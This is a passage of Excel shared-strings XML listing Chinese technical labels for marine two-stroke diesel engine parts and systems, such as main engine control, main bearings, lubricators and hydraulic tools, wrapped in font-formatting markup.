    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机型</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机控制系统，定距桨，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>MC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机型</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机控制系统，调距桨，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>26-46 MC/MC-C</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机控制系统，调距桨，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>MC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机型</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机控制系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-MC-S</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型主机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机控制系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-ME-B</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机型</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机控制系统图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机冷却水质量</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机内部的循环油系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机内部燃油系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>WIRING ON ENGINE</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>TB-ALCU,MT.COMP.</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机配线</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>,TB-ALCU.MT.COMP.</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机润滑油备用泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机润滑油泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机润滑油冷却器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机上的燃油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机试车台</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机适配规格</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机停止后操作</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机通用说明书</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机校正</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机性能参数</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机液压泵站</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机液压滤器单元</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机一览表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机用传感器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机轴系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机主要数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机自动停车</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机做功效率评估</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主控阀布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主控台</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主控制机旁操纵台，停车，前进，后退，启动，可变浆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> 26</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主控制台，机旁操纵台，停车，前进，后退，停车，定距浆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轮毂尺寸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主起动阀质量控制</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主起动空气阀布置</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主起动空气管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主适配器齿轮壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主要工具外形图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主要工具箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主液压管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主液压管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承，铅</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铜</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承，提升工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锡</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铝</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承白合金</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>薄轴瓦设计</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承测量工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承导向钢丝</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承的顶部间隙</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承的液压工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承垫片</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承吊具螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承吊索用滑轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承顶部间隙</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承盖拆装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承盖吊具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承钢索滑轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>厚轴瓦设计</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承滑油管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承滑油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承间隙测量工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承监测</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承监控</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承螺钉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承螺柱</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承桥规</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承上瓦</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承下瓦</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承校中</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承液压工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承液压拉伸器</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承油管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴瓦拆卸工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴瓦工具</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴瓦提升工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴瓦用钢丝盘瓦</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注油泵安装装置弹簧</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注油控制单元</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注油器测试设备</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注油器的调整</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注油器壳体总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注油器驱动齿轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注油器驱动支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注油器驱动轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注油器外文图纸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注油枪</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柱塞密封工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
